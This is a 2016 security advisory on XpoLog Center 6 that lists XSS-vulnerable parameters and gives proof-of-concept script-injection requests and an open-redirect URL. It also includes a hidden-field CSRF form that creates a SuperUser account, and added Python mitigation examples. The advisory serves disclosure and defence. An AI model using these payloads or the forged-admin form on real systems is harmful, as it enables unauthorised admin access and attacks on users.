
XpoLog Center 6 XSS / CSRF / Open Redirect

Posted Jul 1, 2016
Authored by LiquidWorm | Site zeroscience.mk

XpoLog version 6 suffers from cross site scripting, open redirection, and cross site request forgery vulnerabilities.

tags | exploit, xss, csrf
SHA-256 | 2ab464bfc0f5a39be1056dbad1fb0a9fec338572e2cfc1ea1b4a2426dadeeb5e


XpoLog Center V6 Multiple Remote Vulnerabilities


Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
                  6.4254
                  6.4252
                  6.4250
                  6.4237
                  6.4235
                  5.4018

Summary: Applications Log Analysis and Management Platform.

Desc: XpoLog suffers from multiple vulnerabilities including
XSS, Open Redirection and Cross-Site Request Forgery.

Tested on: Apache-Coyote/1.1
           Microsoft Windows Server 2012
           Microsoft Windows 7 Professional SP1 EN 64bit
           Java/1.7.0_45
           Java/1.8.0.91


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5334
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5334.php


14.06.2016

--


XSS:
----

http://10.0.0.17:30303/logeye/apps/admin/appAdminAction.jsp [actionType parameter]
http://10.0.0.17:30303/logeye/apps/admin/appAdminAction.jsp [dataGenerationInterval parameter]
http://10.0.0.17:30303/logeye/apps/admin/appAdminAction.jsp [desc parameter]
http://10.0.0.17:30303/logeye/apps/admin/appAdminAction.jsp [key JSON parameter within the timeFrame parameter]
http://10.0.0.17:30303/logeye/apps/admin/appAdminAction.jsp [name parameter]
http://10.0.0.17:30303/logeye/apps/getData.jsp [id JSON parameter within the appsModelObj parameter]
http://10.0.0.17:30303/logeye/common/addLogFilter.jsp [newFilterLabel parameter]
http://10.0.0.17:30303/logeye/common/addLogFilter.jsp [tableStyle parameter]
http://10.0.0.17:30303/logeye/common/buttonsFooter.jsp [actionNames parameter]
http://10.0.0.17:30303/logeye/common/buttonsFooter.jsp [actions parameter]
http://10.0.0.17:30303/logeye/common/buttonsFooter.jsp [align parameter]
http://10.0.0.17:30303/logeye/common/buttonsFooter.jsp [baseDirectory parameter]
http://10.0.0.17:30303/logeye/common/selectLog.jsp [ignoreHeader parameter]
http://10.0.0.17:30303/logeye/common/validatePath.jsp [path parameter]
http://10.0.0.17:30303/logeye/componentAction.jsp [forward parameter]
http://10.0.0.17:30303/logeye/componentAction.jsp [mainPage parameter within the forward parameter]
http://10.0.0.17:30303/logeye/dashboard/admin/dashboardAdministration.jsp [name of an arbitrarily supplied URL parameter]
http://10.0.0.17:30303/logeye/dashboard/view/updateDashboardModel.jsp [viewBy parameter]
http://10.0.0.17:30303/logeye/listeners/admin/listenersAdminViewAccountsTable.jsp [type parameter]
http://10.0.0.17:30303/logeye/listeners/admin/listenersAdminViewAccountsTableContent.jsp [type parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [buttonsActions parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [buttonsAlign parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [buttonsColors parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [buttonsIds parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [buttonsTexts parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [divId parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [id parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [title parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [titleImage parameter]
http://10.0.0.17:30303/logeye/loggers/admin/logAdminGate.jsp [logType parameter]
http://10.0.0.17:30303/logeye/monitor/monitorDefinition.jsp [name of an arbitrarily supplied URL parameter]
http://10.0.0.17:30303/logeye/root.jsp [mainPage parameter]
http://10.0.0.17:30303/logeye/settings/mailsetaction.jsp [HttpPort parameter]
http://10.0.0.17:30303/logeye/settings/mailsetaction.jsp [SslProt parameter]
http://10.0.0.17:30303/logeye/settings/saveopok.jsp [userMessage parameter]
http://10.0.0.17:30303/logeye/settings/settings.jsp [message parameter]
http://10.0.0.17:30303/logeye/support/basic/logsViewXML.jsp [clusterNode parameter]
http://10.0.0.17:30303/logeye/tasks/xpotaskDefinition.jsp [ID parameter]
http://10.0.0.17:30303/logeye/tasks/xpotaskDefinition.jsp [TASK_TYPE parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountAction.jsp [ACTION_TYPE parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountAction.jsp [Name parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountDiv.jsp [ACC_ID parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountDiv.jsp [ACC_TYPE parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountDiv.jsp [base_directory parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountDiv.jsp [divHeight parameter]
http://10.0.0.17:30303/logeye/tools/addresses/db/general/driverHandler.jsp [url parameter]

PoC:
----

POST /logeye/common/addLogFilter.jsp? HTTP/1.1
Host: 10.0.0.17:30303

baseDirectory=../&embedded=true&tableStyle=none&newFilterLabel=Match%20Text<script>alert(1)<%2fscript>8&ajaxTimestamp=1465928888471

--

GET /logeye/componentAction.jsp?selectedCompId=XpoLog&forward=root.jsp%3fmainPage%3dsettings%2fsettings.jsp><script>alert(2)</script> HTTP/1.1
GET /logeye/root.jsp?mainPage=javascript:alert(3)//


Open Redirect:
--------------

http://10.0.0.17:30303/logeye/componentAction.jsp?selectedCompId=XpoLog&forward=http://zeroscience.mk
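
Mitigation sketch for the forward and mainPage findings above (the open redirect and the script injection through the same parameters). This is an added example, not part of the advisory or of XpoLog's code; the function names and the rule that legitimate targets are relative .jsp paths are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Assumption: every legitimate target is a relative .jsp page path.
# The allowlist has no ":" (so no http: or javascript: scheme) and no
# markup characters, which covers both the redirect and the XSS cases.
SAFE_PATH = re.compile(r"[A-Za-z0-9_\-./]+\.jsp")
# Parameters that name another page to load, as listed in the advisory.
NESTED_TARGETS = {"mainPage", "forward"}
MARKUP = set("<>\"'`\\")
MAX_DEPTH = 3  # forward -> mainPage -> ... nesting limit


def is_safe_target(value: str, depth: int = 0) -> bool:
    """True only if the URL-decoded value is a relative in-app page."""
    if depth > MAX_DEPTH or not value:
        return False
    path, _, query = value.partition("?")
    if not SAFE_PATH.fullmatch(path):
        return False
    # Reject absolute ("/x"), scheme-relative ("//host") and "..".
    if path.startswith("/") or ".." in path.split("/"):
        return False
    for name, val in parse_qsl(query, keep_blank_values=True):
        if name in NESTED_TARGETS:
            # A target carried inside a target gets the same checks.
            if not is_safe_target(val, depth + 1):
                return False
        elif MARKUP & set(name + val):
            return False
    return True


def resolve_target(value: str, default: str = "root.jsp") -> str:
    """Return the requested page if it is safe, else a fixed default."""
    return value if is_safe_target(value) else default
```

Validation of this kind stops off-site and script-scheme targets; values that are written back into HTML still need output encoding at the point of rendering.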


CSRF Add SuperUser:
-------------------

<html>
<body>
<form action="http://10.0.0.17:30303/logeye/security/management/userSettingsAction.jsp" method="POST">
<input type="hidden" name="isEditMode" value="false" />
<input type="hidden" name="username" value="testingus" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="confirmPassword" value="123123" />
<input type="hidden" name="displayName" value="Tester" />
<input type="hidden" name="availableGroupsList" value="SuperUser" />
<input type="hidden" name="SelectedGroupsList" value="All" />
<input type="hidden" name="SelectedGroupsList" value="administrators" />
<input type="hidden" name="SelectedGroupsList" value="SuperUser" />
<input type="hidden" name="administeredGroupsList" value="All" />
<input type="hidden" name="SelectedAdministeredGroupsList" value="SuperUser" />
<input type="hidden" name="SelectedAdministeredGroupsList" value="administrators" />
<input type="hidden" name="SelectedAdministeredGroupsList" value="All" />
<input type="hidden" name="UserPolicy" value="sone" />
<input type="hidden" name="selectedPolicy" value="default" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
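
A request check that could sit in a reverse proxy in front of an unpatched instance, shown as an added example (not from the advisory or the vendor). It rejects state-changing requests whose Origin/Referer is not the application's own origin and notes when the request matches the user-creation form above; the function names and the trusted origin are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}
# Assumption: the application changes state only on non-safe methods.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
# Endpoint and group names as they appear in the advisory's form.
USER_ACTION = "/logeye/security/management/userSettingsAction.jsp"
PRIVILEGED_GROUPS = {"SuperUser", "administrators"}


def origin_of(url):
    """Normalise a URL or Origin value to (scheme, host, port), else None."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return None
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None  # also covers the literal Origin value "null"
    return (parts.scheme, parts.hostname, port or DEFAULT_PORTS[parts.scheme])


def check_request(method, path, headers, body, trusted_origin):
    """Return (allowed, reason) for one request seen at the proxy."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    hdrs = {k.lower(): v for k, v in headers.items()}
    # Current browsers send Origin on cross-site form POSTs;
    # Referer is used as the fallback when Origin is absent.
    source = origin_of(hdrs.get("origin") or hdrs.get("referer") or "")
    if source is not None and source == origin_of(trusted_origin):
        return True, "same origin"
    reason = "state-changing request without a trusted Origin/Referer"
    form = parse_qs(body)
    hit = set(form.get("SelectedGroupsList", [])) & PRIVILEGED_GROUPS
    if path == USER_ACTION and form.get("isEditMode") == ["false"] and hit:
        reason += "; creates a user in " + ", ".join(sorted(hit))
    return False, reason
```

The header check is a stopgap for deployments that cannot change the application; a per-session anti-CSRF token validated by the application itself is the durable fix.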